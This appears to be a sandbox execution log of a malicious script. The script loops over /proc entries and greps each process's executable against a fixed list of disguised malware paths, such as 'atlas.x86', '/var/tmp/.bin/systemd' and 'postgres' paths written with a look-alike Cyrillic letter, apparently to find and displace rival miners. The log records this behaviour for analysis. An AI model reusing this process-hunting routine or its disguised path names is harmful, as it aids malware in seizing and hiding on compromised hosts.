/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1055
-
-
/bin/grepgrep exe4⤵PID:1059
-
-
/bin/lsls -latrh /proc/7064⤵PID:1058
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1061
-
-
/bin/grepgrep exe4⤵PID:1065
-
-
/bin/lsls -latrh /proc/7074⤵PID:1064
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1070
-
-
/bin/grepgrep exe4⤵PID:1074
-
-
/bin/lsls -latrh /proc/714⤵PID:1073
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1076
-
-
/bin/grepgrep exe4⤵PID:1080
-
-
/bin/lsls -latrh /proc/724⤵PID:1079
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1083
-
-
/bin/grepgrep exe4⤵PID:1087
-
-
/bin/lsls -latrh /proc/734⤵PID:1086
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1091
-
-
/bin/grepgrep exe4⤵PID:1094
-
-
/bin/lsls -latrh /proc/7394⤵PID:1093
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1097
-
-
/bin/grepgrep exe4⤵PID:1100
-
-
/bin/lsls -latrh /proc/744⤵PID:1099
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1102
-
-
/bin/grepgrep exe4⤵PID:1106
-
-
/bin/lsls -latrh /proc/7454⤵PID:1105
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1108
-
-
/bin/grepgrep exe4⤵PID:1111
-
-
/bin/lsls -latrh /proc/7464⤵PID:1110
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1113
-
-
/bin/grepgrep exe4⤵PID:1116
-
-
/bin/lsls -latrh /proc/7484⤵PID:1115
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1118
-
-
/bin/grepgrep exe4⤵PID:1121
-
-
/bin/lsls -latrh /proc/7494⤵PID:1120
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1123
-
-
/bin/grepgrep exe4⤵PID:1126
-
-
/bin/lsls -latrh /proc/754⤵PID:1125
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1128
-
-
/bin/lsls -latrh /proc/7504⤵PID:1130
-
-
/bin/grepgrep exe4⤵PID:1131
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1133
-
-
/bin/grepgrep exe4⤵PID:1136
-
-
/bin/lsls -latrh /proc/7514⤵PID:1135
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1138
-
-
/bin/grepgrep exe4⤵PID:1141
-
-
/bin/lsls -latrh /proc/764⤵PID:1140
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1143
-
-
/bin/grepgrep exe4⤵PID:1146
-
-
/bin/lsls -latrh /proc/774⤵PID:1145
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1151
-
-
/bin/grepgrep exe4⤵PID:1154
-
-
/bin/lsls -latrh /proc/784⤵PID:1153
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1156
-
-
/bin/grepgrep exe4⤵PID:1159
-
-
/bin/lsls -latrh /proc/84⤵PID:1158
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1161
-
-
/bin/grepgrep exe4⤵PID:1164
-
-
/bin/lsls -latrh /proc/814⤵PID:1163
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1166
-
-
/bin/grepgrep exe4⤵PID:1169
-
-
/bin/lsls -latrh /proc/824⤵PID:1168
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1171
-
-
/bin/grepgrep exe4⤵PID:1174
-
-
/bin/lsls -latrh /proc/844⤵PID:1173
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1176
-
-
/bin/grepgrep exe4⤵PID:1179
-
-
/bin/lsls -latrh /proc/94⤵PID:1178
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1181
-
-
/bin/grepgrep exe4⤵PID:1184
-
-
/bin/lsls -latrh /proc/buddyinfo4⤵PID:1183
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1186
-
-
/bin/grepgrep exe4⤵PID:1189
-
-
/bin/lsls -latrh /proc/bus4⤵PID:1188
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1191
-
-
/bin/grepgrep exe4⤵PID:1194
-
-
/bin/lsls -latrh /proc/cgroups4⤵PID:1193
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1196
-
-
/bin/grepgrep exe4⤵PID:1199
-
-
/bin/lsls -latrh /proc/cmdline4⤵PID:1198
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1201
-
-
/bin/grepgrep exe4⤵PID:1204
-
-
/bin/lsls -latrh /proc/consoles4⤵PID:1203
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1206
-
-
/bin/grepgrep exe4⤵PID:1209
-
-
/bin/lsls -latrh /proc/cpuinfo4⤵PID:1208
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1211
-
-
/bin/grepgrep exe4⤵PID:1214
-
-
/bin/lsls -latrh /proc/crypto4⤵PID:1213
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1216
-
-
/bin/lsls -latrh /proc/devices4⤵PID:1218
-
-
/bin/grepgrep exe4⤵PID:1219
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1221
-
-
/bin/grepgrep exe4⤵PID:1224
-
-
/bin/lsls -latrh /proc/device-tree4⤵PID:1223
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1226
-
-
/bin/grepgrep exe4⤵PID:1229
-
-
/bin/lsls -latrh /proc/diskstats4⤵PID:1228
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1231
-
-
/bin/lsls -latrh /proc/dma4⤵PID:1233
-
-
/bin/grepgrep exe4⤵PID:1234
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1236
-
-
/bin/grepgrep exe4⤵PID:1239
-
-
/bin/lsls -latrh /proc/driver4⤵PID:1238
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1241
-
-
/bin/lsls -latrh /proc/execdomains4⤵PID:1243
-
-
/bin/grepgrep exe4⤵PID:1244
-
-
